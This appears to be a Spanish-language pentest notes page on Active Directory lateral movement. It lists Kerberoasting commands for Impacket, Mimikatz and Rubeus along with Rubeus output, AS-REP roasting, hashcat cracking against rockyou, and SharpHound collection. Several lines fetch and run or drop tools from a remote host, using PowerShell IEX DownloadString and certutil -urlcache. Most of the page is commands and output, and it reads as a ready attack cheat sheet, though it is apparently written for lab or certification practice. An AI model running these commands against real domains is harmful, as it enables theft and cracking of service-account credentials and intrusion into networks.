AD Lateral Movement

Obteniendo ticket Kerberos por medio de Rubeus

## Metodo Impacket
impacket-GetUserSPNs controller.local/Machine1:Password1 -dc-ip 10.10.10.111 -request
## Metodo Mimikatz
powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.111/GetUserSPNs.ps1')
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/xor-app23.xor.com:1433"
certutil.exe -f -urlcache -split http://10.10.10.111/mimikatz.exe
.\mimikatz.exe 'kerberos::list /export' exit


C:\xampp\htdocs\books\myFiles\backups>Rubeus.exe kerberoast /outfile:hash.txt
Rubeus.exe kerberoast /outfile:hash.txt

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.1 


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : xor.com
[*] Searching path 'LDAP://xor-dc01.xor.com/DC=xor,DC=com' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 3


[*] SamAccountName         : ExchangeService
[*] DistinguishedName      : CN=ExchangeService,OU=ServiceAccounts,OU=xorUsr,DC=xor,DC=com
[*] ServicePrincipalName   : HTTP/ExchangeService.xor.com
[*] PwdLastSet             : 5/20/2019 1:07:08 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\xampp\htdocs\books\myFiles\backups\hash.txt
LogoGitHub - r3motecontrol/Ghostpack-CompiledBinaries: Compiled Binaries for Ghostpack (.NET v4.0)GitHub
python3 tgsrepcrack.py /usr/share/wordlists/rockyou.txt /home/gerh/Escritorio/OSCP/Machines/host-123/KERBEROS/4-40a10000-xor-app59\$@MSSQLSvc\~xor-app23.xor.com\~1433-XOR.COM.kirbi
hashcat --force -m 13100 hash-end.txt /usr/share/wordlists/rockyou.txt

AS-REP

 Rubeus.exe asreproast
 # Insert 23$ after $krb5asrep$ so that the first line will be $krb5asrep$23$User
 hashcat -m 18200 hash.txt Pass.txt.

SHARPHOUND

.\SharpHound.exe -c all

PS C:\htb> Import-Module .\SharpHound.ps1
PS C:\htb> Invoke-BloodHound -CollectionMethod all
AnteriorAD AuthenticationSiguienteAD Vulnerabilidades actuales

Última actualización